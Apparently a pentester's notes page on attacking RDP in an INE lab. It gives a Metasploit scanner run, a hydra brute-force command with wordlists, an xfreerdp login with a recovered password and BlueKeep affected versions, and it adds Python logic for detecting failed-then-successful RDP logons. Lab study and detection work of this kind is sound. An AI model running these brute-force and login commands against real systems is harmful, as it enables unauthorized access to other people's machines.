# Port 3389 - RDP

### Identifying RDP on a non-default port with the aux scanner

```
msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS demo.ine.local
set RPORT 3333
exploit
```

The `rdp_scanner` auxiliary module identifies RDP endpoints, so it confirms whether the service listening on port 3333 is actually RDP.

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F1dzi3Yrdrh8cKoa9GWdu%2FScreenshot_2.png?alt=media&#x26;token=7d6bdb5c-e933-4b24-809a-86d0b404be62" alt=""><figcaption></figcaption></figure>

### Bruteforcing RDP (hydra)

```
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://demo.ine.local -s 3333
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2F3srXGm71IlWPHvZLp8MS%2FScreenshot_3.png?alt=media&#x26;token=5268d0aa-6e4c-4e37-89fc-a3a728963057" alt=""><figcaption></figcaption></figure>

### XFREERDP

```
xfreerdp /u:administrator /p:qwertyuiop /v:demo.ine.local:3333
```

### Detecting RDP Attacks

{% embed url="<https://www.thedfirspot.com/post/lateral-movement-remote-desktop-protocol-rdp-event-logs>" %}
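
An added example (not from the original notes or the linked article): detection logic for a burst of failed logons followed by a success from the same source, the pattern that the hydra run and the xfreerdp login above leave in the Windows Security log. The record fields, IP addresses, threshold and sample events are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# 10 = RemoteInteractive; 3 = Network (RDP with NLA, but also other network logons,
# so real data needs further filtering). Treating both as RDP is an assumption here.
RDP_LOGON_TYPES = {3, 10}
FAILED, SUCCESS = 4625, 4624  # Windows Security event IDs

def ev(sec, event_id, ip, user, logon_type=3):
    """Build one constructed record (stand-in for a parsed Security log entry)."""
    t = datetime(2024, 1, 1, 9, 0, 0) + timedelta(seconds=sec)
    return {"time": t, "event_id": event_id, "ip": ip, "user": user,
            "logon_type": logon_type}

# Constructed sample data, not real logs.
SAMPLE_EVENTS = (
    [ev(i * 2, FAILED, "192.0.2.10", u) for i, u in enumerate(
        ["admin", "root", "sysadmin", "administrator", "administrator", "administrator"])]
    + [ev(14, SUCCESS, "192.0.2.10", "administrator", 10)]  # success right after the burst
    + [ev(30, FAILED, "198.51.100.7", "alice"),              # one typo, then a normal logon
       ev(40, SUCCESS, "198.51.100.7", "alice", 10),
       ev(50, FAILED, "-", "bob", 2)]                         # console logon: not RDP, ignored
)

def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Flag source IPs with >= threshold failed RDP logons inside the window and
    list accounts that logged on successfully from that IP during the burst."""
    recent = defaultdict(list)  # ip -> failure timestamps still inside the window
    findings = {}
    for e in sorted(events, key=lambda x: x["time"]):
        if e["logon_type"] not in RDP_LOGON_TYPES:
            continue
        ip, now = e["ip"], e["time"]
        recent[ip] = [t for t in recent[ip] if now - t <= window]
        if e["event_id"] == FAILED:
            recent[ip].append(now)
        if len(recent[ip]) < threshold:
            continue
        hit = findings.setdefault(ip, {"failures": 0, "success_after_burst": []})
        hit["failures"] = max(hit["failures"], len(recent[ip]))
        if e["event_id"] == SUCCESS:
            hit["success_after_burst"].append(e["user"])
    return findings

if __name__ == "__main__":
    for ip, hit in detect_rdp_bruteforce(SAMPLE_EVENTS).items():
        print(ip, hit)
```

A non-empty `success_after_burst` list is the high-priority case: the guessing stopped because a credential worked.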

### CVE-2019-0708 Bluekeep

Exploitation fails if Network Level Authentication (NLA) is enabled.

The BlueKeep vulnerability affects multiple versions of Windows:

* Windows XP
* Windows Vista
* Windows 7
* Windows Server 2008 and 2008 R2

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FmbtI1s5nse18oPng9wyS%2Fimage.png?alt=media&#x26;token=3943c30d-cfd5-4da7-96fe-304aaa9c6550" alt=""><figcaption></figcaption></figure>

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FENGVvJUWOT5DzQs26O8q%2Fimage.png?alt=media&#x26;token=ddbab3db-fef0-48ba-aa03-ace55cc3b9c1" alt=""><figcaption></figcaption></figure>
